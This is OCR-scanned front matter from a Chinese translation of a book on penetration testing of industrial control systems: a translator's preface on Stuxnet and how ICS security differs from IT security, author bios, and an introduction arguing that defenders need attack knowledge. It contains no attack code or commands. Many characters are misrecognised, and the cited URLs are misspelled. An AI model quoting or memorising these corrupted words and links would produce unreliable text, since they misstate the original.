2016 年 2 月 ， 一 部 名 为 《Zero Day》 的 纪录 片 在 柏林 国际 电影 节 上 映 ， 这 部 影片 在 烂 番 茄 影评 网 站 上 获得 了 平均 为 7.4 的 评分 (同年 《美国 队长 3: 英雄 内 
战 》 平 均 评 分 为 7.6) ， 影 片 纪录 了 一 起 在 2010 年 人 们 广泛 关注 的 恶意 代码 攻击 事件 : 一 款 名 为 Stuxnet 的 蠕虫 发 起 了 针对 西门 子 公 司 数据 采集 与 监控 系统 
SIMATIC WinCC 的 攻击 。 自 此 ， 针 对 工控 系统 的 潘多拉 魔 盒 被 打开 了 .…… 


Stuxnet 里 虫 攻击 事件 发 生 之 后 ， 人 们 纷纷 将 目光 聚焦 到 了 工业 控制 系统 之 上 。 那 么 ， 工 业 控制 系统 是 什么 ? 与 物 联 网 、 工 业 4.0、 工 业 物 联网 、SCADA 相 
比 ， 工 控 系 统 有 什么 区 别 ? 针对 工控 系统 的 攻击 为 什么 会 造成 那么 大 的 破坏 ? 我 们 如 何 来 保障 工控 系统 的 安全 ? 等 一 系列 问题 纷 至 洽 来 。 


根据 美国 国家 标准 技术 研究 院 (NIST) 给 出 的 定义 ， 工 业 控 制 系 统 (Industrial Control System, ICS) 是 多 种 控制 系统 的 总 称 ， 包 括 监控 和 数据 采集 系统 
(SCADA) 、 集 散 控 制 系统 (DCS) ， 以 及 工业 部 门 和 关键 基础 设施 中 常见 的 可 编程 序 控制 器 (PLC) 等 控制 系统 。 工 业 控制 系统 通常 由 共同 作用 以 期 实现 某 一 
工业 用 途 (例如 ， 物 质 或 能 量 的 制造 、 运 输 ) 的 控制 部 件 (例如 电器 、 机 械 、 液 压 、 气 动 ) 组 合 而 成 。 当 前 ， 工 控 系 统 已 经 广泛 应 用 于 电力 、 石 油 、 天 然 气 、 核 
人 能、 化工、 食品、 医疗、 水利、 交通 等 众多 关键 基础 设施 之 中 。 


早期 的 工业 控制 系统 同 互联 网 物理 隔离 ， 且 大 多 采用 专用 软 硬 件 ， 因 此 即便 工控 系统 中 存在 安全 隐患 ， 但 外 界 既 难以 接触 到 工控 系统 也 难以 展开 对 工控 系统 
的 研究 。 但 是 ， 随 着 IT 技术 在 工业 环境 中 的 广泛 应 用 ， 通 用 计算 设备 、 通 用 操作 系统 开始 用 于 工控 系统 的 实现 ， 工 控 协 议 也 开始 基于 TCP/IP 协 议 构建 ， 传 统 IT 系 
统 所 面临 的 威胁 蔓延 到 了 工控 系统 环境 当中 。 尤 其 自从 2010 年 Stuxnet 旺 虫 出 现 以 来 ， 针 对 工控 系统 领域 的 关注 度 飙 升 ，2011 年 至 2015 年 工控 系统 的 安全 事件 经 
历 了 一 段 时 期 的 快速 增长 ， 直 到 2016 年 增 速 才 逐 渐 放 组 。[1] 


虽然 同 传统 IT 技 术 之 间 存 在 着 干 丝 万 缕 的 联系 ， 然 而 由 于 工业 控制 系统 在 结构 和 作用 上 的 特点 ， 使 得 其 同 传 统 IT 系 统 安 全 相 比 呈现 出 了 诸多 区 别 : 
工控 系统 设计 时 未 从 信息 安全 角度 进行 考量 


工控 系统 在 设计 时 大 多 仪 仅 考 碟 了 功能 安全 ， 即 确保 工控 系统 能 够 正确 执行 其 功能 ， 并 且 当 系统 失效 或 出 现 故障 时 ， 设 备 或 系统 仍然 能 够 处 于 安装 状态 或 进 
入 到 安全 状态 。 但 是 ， 工 控 系 统 环 境 中 的 设备 、 协 议 及 应 用 程序 在 设计 之 初 并 没有 考虑 到 信息 安全 问题 。 某 些 情 况 对 于 IT 网 络 而 言 通常 是 正常 的 ， 然 而 在 工控 系 
统 环 境 中 却 可 能 市 来 不 可 逆转 的 负面 影响 。 而 且 ， 工 控 系 统 中 的 应 用 程序 和 协议 最 初 都 是 在 没有 考虑 认证 和 加 密 机 制 以 及 常见 网 络 攻击 方式 的 情况 下 设计 开发 
的 。 


- 工控 系统 中 信息 安全 三 要 素 的 优先 级 不 同 


传统 IT 系 统 安 全 中 的 三 要 素 分 别 是 保密 性 、 完 整 性 和 可 用 性 ， 但 是 在 工控 系统 中 需要 对 三 要 素 的 顺序 进行 调整 。 对 于 工控 系统 而 言 ， 系 统 的 可 用 性 至 关 重 
要 ， 因 此 需要 将 可 用 性 放 在 考虑 安全 问题 的 第 一 位 ， 即 可 用 性 、 完 整 性 、 保 密 性 。 此 外 ， 优 先 级 的 变化 不 仅仅 体现 在 安全 要 素 的 排序 之 上 ， 更 关键 的 是 在 应 对 工 
控 系 统 安全 问题 时 按照 该 优先 顺序 考虑 问题 。 


. 工控 系统 设备 的 处 理 能 力 过 载 阀 值 较 低 


许多 工控 系统 设备 ， 比 如 PLC 与 RTU 均 用 到 了 钦 入 式 处 理 器 ， 而 秦 入 式 处 理 器 在 特定 条 件 下 可 能 非 党 容易 过 载 。 当 挫 入 式 处 理 器 过 载 时 ， 融 可 能 会 对 设备 的 可 
用 性 造成 影响 ， 导 致 包 括 设备 响应 中 断 、 复 位 、 故 障 、 网 络 通信 中 断 ， 甚 至 出 现 配 置 丢 失 的 情况 。 


. 工控 系统 设备 的 网 络 堆 栈 处 理 能 力 较 弱 


很 多 工控 系统 设备 处 理 异常 流量 的 能 力 较为 薄弱 。 当 向 工控 系统 设备 发 送 异 常 流 量 时 ， 例 如 超 长 数据 包 、 上 畸形 数据 包 、 高 速 网 络 包 ， 抑 或 是 未 使 用 预定 协议 
的 数据 包 ， 也 会 导致 设备 响应 中 断 、 复 位 、 故 障 、 网 络 通 信 中 断 等 情况 。 


` 工控 系统 环境 中 大 量 使 用 遗留 的 老式 系统 


无 论 是 控制 设备 本 身 还 是 老式 的 服务 器 与 工作 由， 大 多 数 工控 系统 环境 中 依然 保留 有 大 量 遗 留 的 老式 系统 ， 这 些 老式 系统 甚至 还 在 使 用 Windows XP, 
Windows NT、Windows95 等 操作 系统 。 这 些 遗 留 的 老式 系统 不 仅 有 些 已 经 停止 更 新 ， 而 且 即 便 是 安装 某 些 软件 对 其 进行 加 固 都 可 能 会 导致 资源 耗 尽 与 系统 衣 


l 
工控 系统 网 络 的 网 络 带宽 较 低 


同 传统 的 业务 IT 网 络 相 比 ， 许 多 工控 系统 网 络 用 于 网 络 连接 的 网 络 囊 宽 较 低 ， 其 原因 在 于 工控 系统 使 用 了 老 旧 的 网 络 设备 或 者 使 用 了 工业 无 线 网 络 ， 其 中 也 
包括 移动 宽 市 和 卫星 通信 。 所 以 ， 引 入 高 速 网 络 流量 可 能 会 导致 网 络 延 迟 甚 至 网 络 通信 的 中 断 ， 哪 怕 看 似 无 害 的 网 络 流量 也 可 能 会 导致 部 分 工控 系统 网 络 的 延 
迟 。 而 对 于 高 可 用 性 网 络 ， 延 迟 也 是 不 可 接受 的 。 


工控 系统 补丁 更 新 不 及 时 且 难 以 应 用 


大 多 数 工控 系统 环境 都 无 法 像 传 统 的 IT 系统 环境 那样 经 常 定期 发 布 补丁 。 而 且 ， 对 于 基于 老式 操作 系统 开发 的 工业 控制 系统 ， 甚 至 可 能 已 经 没有 三 家 能 够 提 


供 可 用 的 安全 补丁 。 同 时 ， 由 于 工控 系统 软件 与 其 底层 之 间 紧 密 耦 合 ， 补 丁 更 新 必须 进行 代价 高 晶 、 耗 时 甚 多 的 回归 测试 。 而 对 补丁 更 新 后 的 软件 进行 测试 以 及 
补丁 后 续 分 发 过 程 中 的 耗 时 ， 则 可 能 导致 工控 系统 在 一 段 相当 长 的 时 间 范 围 内 存在 漏洞 。 此 外 ， 工 控 系 统 本 身 所 具有 的 关键 性 和 敏感 性 也 使 得 对 其 进行 补丁 修复 
工作 较为 困难 ， 工 控 系 统 中 的 很 大 一 部 分 属于 “高 可 用 性 ”系统 ， 因 此 在 定期 维护 时 间 窗 口 之 外 进行 天 机 来 安装 更 新 和 补丁 程序 通常 是 不 现实 的 。 即 使 是 在 定期 
维护 时 间 窗 口 之 内 ， 许 多 传统 的 网 络 安全 措施 (如 反 病 毒 软件 、 安 全 更 新 和 补丁 ) 也 都 有 可 能 对 工控 系统 设备 和 网 络 产 生 负 面 影响 。 


基于 工业 控制 系统 的 自身 特点 ， 本 书 从 渗透 测试 的 角度 介绍 了 针对 工控 系统 进行 安全 研究 所 涉及 的 诸多 方面 ， 必 将 为 工控 系统 的 研究 人 员 提 供 有 益 的 参考 。 
全 书 的 组 织 结构 与 概要 如 下 : 


全 书 共 分 三 个 部 分 : 

第 一 部 分 包括 第 1 章 至 第 3 章 ， 主 要 对 工控 系统 的 架构 与 组 成 、 工 控 系 统 的 风险 评估 以 及 工控 系统 的 威胁 情报 进行 介绍 。 
这 一 部 分 主要 回答 了 以 下 问题 : 

- 工控 系统 主要 功能 有 哪些 ? 

. 工控 系统 中 的 普 渡 参考 模型 是 什么 ? 

` 常见 的 控制 系统 有 哪些 ? 

- 工控 系统 风险 评估 的 评估 与 度量 对 象 有 哪些 ? 

- 如 何 针 对 工控 系统 开展 风险 评估 ? 

` 工控 系统 威胁 情报 的 概念 与 作用 是 什么 ? 

` 工控 系统 环境 中 如 何 开展 威胁 建 模 ? 
第 二 部 分 由 第 4 章 至 第 8 章 组 成 ， 主 要 对 工控 系统 渗透 测试 、 协 议 、 设 备 、 应 用 以 及 针对 工控 系统 的 “0-day” 漏 洞 挖 握 与 恶意 代码 进行 介绍 。 
这 一 部 分 主要 回答 了 以 下 问题 : 

` 工控 系统 渗透 测试 的 测试 方法 有 哪些 ? 

. 针对 工控 系统 与 IT 系统 开展 渗透 测试 的 区 别 有 哪 些 ? 

` 如 何 部 署 工控 系统 渗透 测试 环境 ? 

` 工控 系统 渗透 测试 的 测试 策略 都 有 哪些 ? 

. 工控 系统 主要 采用 哪些 协议 ?针对 这 些 协 议 主 要 有 哪些 攻击 方式 ? 

" 针对 工控 系统 设备 与 应 用 主要 有 哪些 攻击 方式 ? 

. 如 何 着 手 开展 工控 系统 “0-day” 漏 洞 研究 ? 

针对 工控 系统 的 恶意 代码 有 哪些 类 型 ? 各 有 什么 特点 ? 

三 部 分 包括 第 9 章 和 第 10 章 ， 对 工控 系统 安全 标准 及 风险 缓解 策略 进行 介绍 。 
这 一 部 分 主要 回答 了 以 下 问题 : 

` 工控 系统 合 规 性 与 安全 性 之 间 有 什么 关系 ? 

` 常见 的 工控 系统 安全 标准 有 哪些 ? 

. 从 哪些 角度 考量 有 助 于 缓解 工控 系统 常见 风险 ? 如 何 缓解 ? 

` 工控 系统 的 风险 缓解 过 程 包含 哪些 步骤 ? 


本 书 第 3 章 至 第 8 章 由 戴 超 翻译 ， 第 1 草 、 第 2 章 、 第 9 草 、 第 10 草 由 张 鹿 翻 译 ， 全 书 由 戴 超 、 张 鹿 进 行 审 校 。 在 前 期 翻译 过 程 中 ， 王 圆 博士 也 开展 了 大 量 工 
作 ， 在 后 期 审 校 过 程 中 ， 海 康 威 视 网 络 与 信息 安全 实验 室 王 滨 博 士 、 北 京 理工 大 学 王 安 博士 提供 了 大 量 宝贵 意见 ， 在 此 一 并 表示 衷心 的 感谢 。 最 后 ， 感 谢 华章 公 
司 的 编辑 朱 动 、 张 锡 鹏 、 陈 佳 媛 在 本 书 翻译 过 程 中 提供 的 帮助 ， 感 谢 他 们 的 全 力 文 持 与 耐心 指导 ， 在 全 书 的 翻译 过 程 中 使 我 们 少 走 了 很 多 弯路 。 


在 阅读 本 书 的 过 程 中 ， 读 者 可 将 错漏 之 处 与 问题 反馈 给 我 们 ， 联 系 邮 箱 为 icsquestion@163.com， 和 希望 广大 读者 不 音 赐 教 。 
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[1] 数据 来 源 : ICS-CERT «Year in Review 2016» (https://ics-cert.us- 
cert.cov/sites/default/files/Annual_Reports/Year_in_Review_FY2016_Final_S508C.pdf) , FiteEye OVERLOAD, CRITICAL LESSONS FROM 15YEARS OF ICS 
VULNERABILITIES—2016 Industrial Control Systems (ICS) Vulnerability Trend Report > (https://www.fiteeye.com/blog/threat-reseatch/2016/08/overload-ctritical- 


lessons-from-1 5-years-ofics-vulnerabilities.html ) 
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估 等 等 。Bryan Singer 现 居住 于 阿拉 巴 马 州 的 蒙特 瓦 洛 ， 多 次 就 工控 系统 安全 领域 的 问题 撰写 文章 、 发 表演 讲 并 分 享 经 验 。 


Aaron Shbeeb (休斯顿 ， 得 克 萨 斯 州 ) 


Aaron Shbeeb 早 在 少年 时 期 束 对 程序 开发 及 计算 机 安全 产生 了 兴趣 。 他 毕业 于 俄 广 俄 州立 大 学 ， 获 得 了 计算 机 科学 与 工程 理学 学 士 学 位 。Aaron Shbeeb 在 
软件 开发 以 及 安全 岗位 拥有 十 多 年 的 从 业经 验 ， 主 要 关注 安全 程序 设计 实践 。 从 2008 年 起 ， 在 职业 发 展 以 及 个 人 兴趣 的 双重 驱动 下 ，Aaron Shbeeb 开 始 从 事 针 
对 工控 系统 /SCADA 系 统 的 渗透 测试 以 及 安全 研究 工作 。 


Stephen Hilt ( 查 塔 努 加 ， 田 纳西 州 ) 


Stephen Hilt 在 信息 安全 与 工控 系统 安全 领域 工作 了 十 余年 。 从 南 伊利 诺 伊 大 学 获得 学 士 学 位 后 ，Stephen Hilt 供 职 于 美国 一 家 大 型 电力 公司 。 在 该 公司 就 职 
期 间 ，Stephen Hilt 在 安全 网 络 工 程 、 事 件 响 应 、 电 子 取证 、 评 估 以 及 渗透 测试 领域 积 昧 了 丰富 的 经 验 。 随 后 ，stephen Hilt 开 始 关 注 工控 系统 评估 以 及 NERC 
CIP (North American Electric Reliability Council, Critical Infrastructure Protection) 评估 工作 。 鉴 于 其 从 业经 历 ， 世 界 上 最 著名 的 工控 系统 安全 咨询 公司 
Digital Bond 聘 请 他 担任 工控 系统 安全 顾问 与 研究 员 。2014 年 至 2015 年 期 间 ，Stephen Hilt 发 布 了 针对 工控 系统 的 众多 Nmap 脚 本 ， 通 过 本 地 命令 对 工控 系统 协 
议 进行 识别 。 目 前 ，stephen Hilt 担 任 Trend Micro 公 司 的 高 级 威胁 研究 员 ， 继 续 从 事 工 控 系 统 研究 工作 ， 并 在 其 他 高 级 研究 领域 开展 了 深入 的 探索 。 


Kyle Wilhoit ( 费 斯 图 斯 ， 密 苏 里 州 ) 


Kyle Wilhoit 是 Trend Micro 公 司 的 一 名 高 级 威胁 研究 员 ， 主 要 天 注 于 捕获 互联 网 上 的 恶意 代码 。 在 加 入 Trend Micro 公 司 之 前 ，Kyle Wilhoit 就 职 于 FireEye 
公司 ， 主 要 关注 国家 层面 的 攻击 者 。 只 要 Kyle Wilhoit 没 有 去 周游 世界 ， 你 就 可 以 在 他 的 家 乡 圣 路 易 斯 找到 他 。 


技术 审 校 者 简介 


W.Stuart Baily (休斯顿 ， 得 克 萨 斯 州 ) ， 拥 有 CISSP、GICSP 认 证 ， 是 一 名 在 企业 与 工业 控制 系统 网 络 领域 拥有 17 年 从 业经 验 的 IT 安 全 专家 。Stuart 在 医疗 
领域 开始 他 的 职业 生涯 ， 先 后 任职 于 一 家 大 型 临床 系统 和 得 克 萨 斯 医疗 中 心 的 Baylor 医 学 院 ， 其 间 经 历 了 网 络 、 服 务 器 以 及 安全 等 团队 中 的 多 个 岗位 。Stuart 随 
后 就 职 于 Noble 能 源 公司 的 上 游 石 油 与 天 然 气 部 门 ， 他 在 该 部 门 制订 了 控制 系统 的 安全 方案 ， 并 激发 出 了 对 于 工控 系统 安全 的 热情 。 现 在 ，stuart 在 得 克 萨 斯 州 一 
家 公共 事业 机 构 的 安全 团队 工作 。 在 开展 陆 海 油 气 勘探 和 生产 设施 的 现场 安全 评估 、 设 计 控 制 系统 事故 响应 计划 、 拟 制 工控 系统 安全 策略 与 程序 、 开 展 安 全 意识 
培训 、 提 供 新 立 工 控 系 统 项 目 和 咨询 和 评估 部 署 新 型 工控 系统 软 硬 件 等 方面 ，stuart 积 累 了 丰富 的 经 验 。 


AUS 
黑客 大 曝光 一 工业 力量 
宫 无 疑问 ， 本 书 沿 袭 了 《黑客 大 了 曝光》 系列 书籍 的 一 贯 风 格 。 无 论 称 之 为 渗透 测试 (penetration testing 或 pentesting) 、 道 德 入 侵 (ethical hacking) 还 


是 红 队 测试 (red team testing) ， 本 书 主要 从 攻击 的 角度 研究 网 络 安全 问题 。 而 且 ， 在 本 书 中 ， 我 们 主要 研究 工业 控制 系统 (Industrial Control 
Systems, ICS) 的 网 络 安全 (不 管 读者 喜 不 喜欢 ， 主 题 已 经 剧 透 出 来 了 ) ， 根 据 情 况 也 可 以 称 之 为 in-security。 


Ww 注意 


监控 和 数据 采集 系统 (Supervisory Control and Data Acquisition, SCADA) 、 工 业 控 制 系统 (ICS) 以 及 运营 技术 (Operations Technology, OT) 都 是 最 近 在 提 
到 工业 系统 时 常用 的 “万 能 ”术语 。 如 果真 想 深究 营销 术语 ， 还 可 以 将 工业 物 联网 (Tndustrial Internet of Things, HoT) 添加 进去 。 不 过 ， 先 将 这 些 热门 词汇 抛 在 
一 边 ， 除 了 很 多 其 他 的 行业 术语 ， 例 如 : 过 程控 制 域 (Process Control Domain, PCD) 、 过 程控 制 网 络 (Process Control Network, PCN) 、 过 程控 制 系统 (Process 
Control System, PCS) 、 集 散 控 制 系统 (Distributed Control System, DCS) 等 ， 还 有 监控 和 数据 采集 系统 (SCADA) 以 及 工业 控制 系统 (ICS) 也 都 旨 在 描述 工业 
系统 特定 但 又 互 不 相同 的 方面 。 但 是 ， 这 两 个 术语 经 常 被 错误 地 互 换 使 用 。 有 鉴于 此 ， 为 了 简单 起 见 ， 本 书 中 我 们 使 用 “工控 系统 CICS) 来 指 代 工 业 系统 的 所 
有 方面 ， 即 便 我 们 知道 这 个 术语 未 必 在 每 种 场合 下 都 是 正确 的 。 


渗透 测试 .…… 确 定 要 人 在 工业 控制 系统 中 进行 吗 


从 传统 角度 来 讲 ， 当 从 “ 红 队 ”或 者 说 从 攻击 角度 来 讨论 工控 系统 网 络 安全 时 ， 通 常会 遭 到 持 怀疑 态度 并 且 忧 心 刷 虱 的 工业 资产 所 有 者 和 运营 人 员 的 强烈 排 
斥 。 从 “ 蓝 队 ”或 者 说 从 单纯 的 防御 角度 已 经 出 版 了 若干 本 内 容 翔实 的 工控 系统 安全 图 书 ， 然 而 在 我 遇 到 的 来 自 不 同 工 业 部 门 的 人 员 中 ， 还 是 有 人 认为 那些 详细 
介绍 “工控 系统 入 侵 ” (ICS hacking) 技术 的 图 书 压根 儿 就 不 该 出 版 。 这 一 “理论 依据 ”主要 是 源 自 于 这 样 一 支 思 想 流 派 : 他 们 认为 类 似 的 信息 (甚至 包括 向 部 
分 人 士 披露 有 天 工控 系统 的 漏洞 ) 都 应 该 妥善 保管 起 来 ， 只 有 特定 的 专业 团队 还 有 信息 共享 和 分 析 中 心 (Information Sharing and Analysis Centers, ISAC) 
才能 够 获取 这 些 信息 。 这 一 方法 也 被 看 作 是 一 种 阻止 黑客 获取 敏感 信息 的 努力 。 因 为 很 多 人 担心 这 类 信息 会 帮助 黑客 们 制订 工控 系统 攻击 方案 或 者 “入 侵 攻 
略 ”。 而 细 究 起 来 ， 这 种 “策略 ”其 实 是 “不 公开 即 安全 (security through obscurity) 的 另 一 种 形式 ，IT 社 区 早 在 20 年 前 也 是 这 样 的 心态 。 这 也 正 是 整个 行 
业 中 工控 系统 安全 的 领军 人 物 经 常 说 “工控 系统 的 安全 落后 于 其 他 行业 十 多 年 ”的 原因 之 一 。 


但 是 ， 真 相 是 黑客 们 已 经 知道 了 这 些 信息 ， 或 者 最 起 码 知道 如 何 获取 这 类 信息 ， 不 论 业 界 已 经 尽 了 多 大 努力 来 隐藏 它们 。 不 管用 户 喜 不 喜欢 ， 通 过 主流 的 隔 
离 措施 与 不 公开 的 方法 已 经 难以 实现 对 工业 系统 的 保护 。 正 所 谓 木 已 成 丹 ， 已 成 定局 。 既 然 攻击 者 已 经 知道 了 工控 系统 和 SCADA 系 统 的 存 在 ， 并 且 了 解 了 它们 的 
重要 性 ,而且 坦率 地 讲 ， 攻 击 者 也 清楚 它们 到 底 有 多 脆弱 ， 那 么 自然 会 对 开展 攻击 燃 起 狂热 的 兴趣 。 事 实 上 ,与 资产 所 有 者 以 及 运营 人 员 在 学 习 入 侵 技 术 以 及 如 
何 实施 入 侵 方 面 所 付出 的 时 间 相 比 ， 黑 客 们 往往 花费 了 更 多 时 间 来 学 习 工 控 系 统 ， 以 及 如 何 入 侵 这 些 系统 。 支 撑 这 一 发 现 的 证 据 可 以 从 世界 各 地 众多 “黑客 ”大 
会 的 会 议 日 程 中 清晰 地 看 到 ， 例 如 著名 的 Black Hat 和 DefCon， 而 这 只 是 其 中 的 两 个 会 议 。 事 实 上 ， 大 多 数 安全 会 议 现在 都 会 开辟 出 特色 鲜明 的 “工控 系统 小 
镇 ”， 让 与 会 者 可 以 体验 一 把 工控 系统 设备 的 入 侵 。 无 论 读者 是 否 相 和信， 工控 系统 入 侵 正在 迅速 成 为 主流 话题 。 实 际 情况 是 ， 限 制 该 类 信息 的 获取 不 仅 难 以 阻止 
黑客 们 获取 信息 ， 反 而 阻碍 了 真正 需要 这 类 信息 的 人 们 获取 信息 (工业 资产 所 有 者 以 及 运营 人 员 ) ， 更 不 要 说 工业 社区 中 已 经 共享 了 大 量 天 于 安全 事件 和 漏洞 的 
信息 。 然 而 ， 关 于 工控 系统 漏洞 利用 以 及 入 侵 技 术 的 重要 信息 往往 会 被 忽视 。 


为 什么 了 解 攻 击 技术 这 么 重要 ? 简 言 之 就 是 ， 如 果 能 够 像 攻 击 者 一 样 思考 ， 并 县 了 解 其 做 法 ， 那 么 束 有 更 多 的 机 会 阻挡 攻击 者 的 入 侵 。 想 想 看 ， 以 读者 最 言 
欢 的 运动 为 例 (无 论 是 团队 的 还 是 个 人 的 ) ,是否 有 人 在 不 了 解 对 手 攻击 方式 的 情况 下 就 踏 上 赛场 ? 当然 了 ， 肯 定 会 有 这 种 情况 ,但 是 在 这 种 情况 下 ， 通 常 是 场 
有 利于 对 手 的 一 边 倒 的 比赛 。 在 对 对 手 的 攻击 策略 与 攻击 方法 一 无 所 知 的 情况 下 ， 实 施 针 对 攻击 的 有 效 防御 是 相当 困难 的 一 件 事 。 在 工控 系统 网 络 安全 领域 中 也 
是 这 样 。 对 攻击 、 漏 洞 利用 和 恶意 代码 感染 的 方法 与 技术 细节 越 了 解 ， 有 的 放 矢 地 开展 防御 束 越 准确 、 越 高 效 ， 性 价 比 也 越 高 。 考 虑 一 下 ， 下 面 哪 种 方法 听 起 来 
更 加 高 效 、 性 价 比 更 高 ? 


1) 以 “层次 防御 ”以 及 网 络 安全 标准 合 规 性 的 名 义 ， 尽 可 能 多 地 尝试 采用 一 抄 子 “最 佳 实践 ”、。 


2) 对 于 经 过 验证 得 出 的 的 确 存在 漏洞 的 地 方 ， 根 据 其 潜在 影响 的 严重 程度 进行 优先 级 排序 ， 针 对 最 有 可 能 面临 的 威胁 部 署 相应 的 对 抗 措施 。 


如 果 回 答 是 “1”， 那 么 恭喜 啦 ， 因 为 你 肯定 拥有 巨额 的 网 络 安全 预算 还 有 大 量 合格 的 工作 人 员 ! 但 是 即便 如 此 ， 仍 然 需要 针对 试探 性 的 攻击 威胁 构建 安全 保 
障 网 。 

对 于 存在 合 规 要 求 的 某 一 行业 来 说 ， 合 规 性 通常 是 其 实施 和 改进 网 络 安全 控制 措施 的 唯一 强制 驱动 力 ， 其 预算 往往 捉襟见肘 ， 即 便 如 此 ， 聘 请 渗透 测试 人 员 
仍 会 体现 出 巨大 的 价值 。 事 实 上 ， 预 算 不 足 正 是 渗透 测试 的 用 武之 地 。 在 结合 适当 的 风险 评估 过 程 〈 详 见 第 2 章 ) 使 用 时 ， 渗 透 测试 〈 详 见 第 4 章 ) 与 威胁 建 模 
( 详 见 第 3 章 ) 相 结 合 的 方式 能 够 提供 更 有 针对 性 而 且 更 加 高 效 的 风险 管理 策略 。 由 于 具备 同 恶 意 攻 击 者 一 样 的 技术 水 平和 知识 储备 ， 渗 透 测试 人 员 能 够 帮助 验证 
潜在 威胁 是 否 确 实 会 对 系统 构成 巨大 风险 ( 同 只 采用 传统 的 风险 评估 方式 相 比 具有 更 高 的 准确 性 ) 。 这 些 信息 有 助 于 改进 风险 缓解 策 略 、 明 晰 目标 资源 中 需要 关 
注 的 重点 、 确 定 可 以 “接受 ”哪些 风险 ， 从 而 降低 对 目标 资源 (金钱 、 时 间 和 人 力 ) 的 影响 。 


Oz 


很 多 人 不 会 立即 将 渗透 测试 和 威胁 建 模 关联 起 来 。 但 是 ， 渗 透 测试 人 员 在 网 络 攻 击 方法 方面 所 具备 的 经 验 与 知识 储备 在 威胁 建 模 过 程 中 确实 是 非常 宝贵 的 资 


当 谈 到 工控 系统 的 可 用 性 、 正 常 运行 时 间 以 及 功能 安全 时 ， (由 于 渗透 测试 通常 具有 主动 性 和 侵入 性 的 特点 ) 往往 会 存在 一 些 对 渗透 测试 的 偏见 。 如 果 示 经 
规范 培训 | 的 测试 人 员 没 有 采用 能 够 保障 工控 系统 安全 ( "ICS safe”) 的 测试 方法 ， 这 种 担心 确实 不 是 空 从 来 风 。 很 多 在 IT 系统 中 没有 危害 的 渗透 测试 方法 可 能 会 
在 工控 系统 环境 中 出 现 副作用 ， 以 至 于 给 安全 与 生产 融 来 风险 。 甚 至 非 囊 简单 的 测试 方法 ， 比 如 端口 扫 摘 在 工控 系统 环境 中 通常 也 是 茶 止 的 。 


所 以 ， 如 何 应 用 渗透 测试 来 保障 工控 系统 安全 呢 y 首先 ， 本 书 将 教会 读者 在 不 影响 生产 系统 的 前 提 下 ， 如 何 应 用 针对 工控 系统 的 渗透 测试 方法 与 技术 。 其 
次 ,我 们 意图 展示 如 何 通 过 以 基于 威胁 建 模 的 方法 应 用 渗透 测试 知识 ， 甚 至 在 无 须 开 展 主动 渗透 测试 的 情况 下 ， 制 订 出 更 加 高 效 (以 及 性 价 比 更 高 ) 的 风险 缓解 
策略 与 部 署 方 案 。 

本 书 所 涵盖 的 内 容 


无 论 是 作为 工控 系统 渗透 测试 指南 还 是 用 于 离线 威胁 建 模 ， 本 书 冒 在 帮助 读者 了 解 攻击 者 所 具备 的 “攻击 性 ”知识 ,使 读者 在 风险 管理 方面 所 做 出 的 努力 具 
有 更 高 的 准确 性 与 性 价 比 。 我 们 在 这 里 使 用 术语 “管理 ”的 原因 在 于 风险 缓解 并 不 总 是 最 优 的 选择 。 在 某 些 情况 下 ， 最 优 的 解决 方案 可 能 只 是 降低 、 接 受 或 者 转 
移 风 险 。 


依据 若干 工业 安全 标准 所 提出 的 要 求 ， 必 须 开展 渗透 测试 ， 而 且 渗 透 测试 也 应 该 成 为 每 个 风险 管理 项 目的 一 部 分 ， 但 我 们 的 本 意 并 不 是 为 具体 的 工控 系统 网 
络 安 全 标准 提供 “ 合 规 性 ”指南 。 本 书 也 无 意 于 作为 工控 系统 风险 缓解 或 管理 技术 的 专用 指南 。 正 如 前 文 提 到 的 ， 从 这 一 角度 出 友 已 经 出 版 了 很 多 书籍 ， 因 此 没 
有 必要 再 进行 重复 。 而 我 们 将 要 分 析 研 究 的 风险 缓解 技术 以 及 对 抗 措 施 则 与 本 书 中 介绍 的 攻击 方式 与 策略 密切 相关 。 


我 们 将 会 讨论 在 CVE 以 及 ICS-CERT 公 告 中 已 经 公开 披露 的 几 个 漏洞 及 其 众多 技术 细节 ， 还 有 相关 的 漏洞 利用 技术 。 但 是 ， 在 工控 系统 厂商 以 及 其 他 业界 成 员 
开始 提心吊胆 之 前 ， 需 要 指出 的 是 我 们 不 会 披露 0-day 漏 洞 (未 公开 漏洞 ) 与 漏洞 利用 工具 。 本 书 中 所 讨论 的 全 部 内 容 都 可 以 采用 各 种 方式 公开 查询 得 到 。 我 们 所 
做 的 仅 是 对 其 中 部 分 CVE 与 ICS-CERT 公 告 进行 剖析 和 研究 ， 以 展示 如 何 开展 针 对 工控 系统 设备 、 应 用 程序 与 环境 的 渗透 测试 、 脆 弱 性 研究 以 及 威胁 建 模 。 


本 书 也 不 打算 对 工控 系统 或 者 通用 渗透 测试 方法 进行 全 面 介绍 。 但 是 ， 当 我 们 认为 出 于 功能 所 需 并 且 与 上 下 文 相关 时 ， 将 会 提供 辅助 资料 ， 或 者 在 需要 进 一 
步 指导 或 者 额外 信息 的 事件 中 指明 正确 的 方向 。 例 如 ， 部 分 读者 可 能 并 不 了 解 工控 系统 环境 的 运行 机 制 ， 所 以 本 书 将 从 较 高 的 层面 对 工控 系统 进行 有 一 定 深度 的 
基础 介绍 ， 以 帮助 读者 理解 本 书 的 内 容 。 (那些 对 工控 系统 已 经 有 深入 了 解 的 读者 可 以 忽略 这 部 分 内 容 。) 类 似 地 ， 还 有 部 分 读者 可 能 对 渗透 测试 的 基础 内 容 不 
太 熟 悉 ， 对 此 本 书 也 提供 了 大 量 关 于 传统 渗透 测试 方法 的 参考 资源 ， 涵 芋 了 从 基础 入 门 到 高 级 技 I5 的 所 有 内 容 。 


我 们 的 轧 体 目标 主要 关注 于 本 书 各 主题 所 涉及 的 同 工 控 系 统 有 关 的 细节 。 放 心 好 了 ， 对 于 想 要 进一步 获取 本 书 未 涉及 的 细节 以 及 指导 的 读者 ， 我 们 也 提供 了 
资料 、 链 接 ， 以 及 参考 文献 以 供 读者 进行 更 深入 的 了 解 。 


本 书面 向 的 读者 


本 书 可 以 作为 对 工控 系统 网 络 安全 感 兴趣 的 读者 的 参考 用 书 ， 但 是 ， 最 终 本 书面 向 的 对 象 是 对 工控 系统 有 关 的 脆弱 点 、 威 胁 或 威胁 建 模 ， 以 及 渗透 测试 技术 
等 技术 细节 感 兴趣 的 读者 ， 包 括 


. 承担 针对 工控 系统 的 渗透 测试 项 目 ， 以 及 希望 了 解 工控 系统 渗透 测试 技术 的 渗透 测试 人 员 
监控 工控 系统 网 络 的 网 络 安全 分 析 人 员 

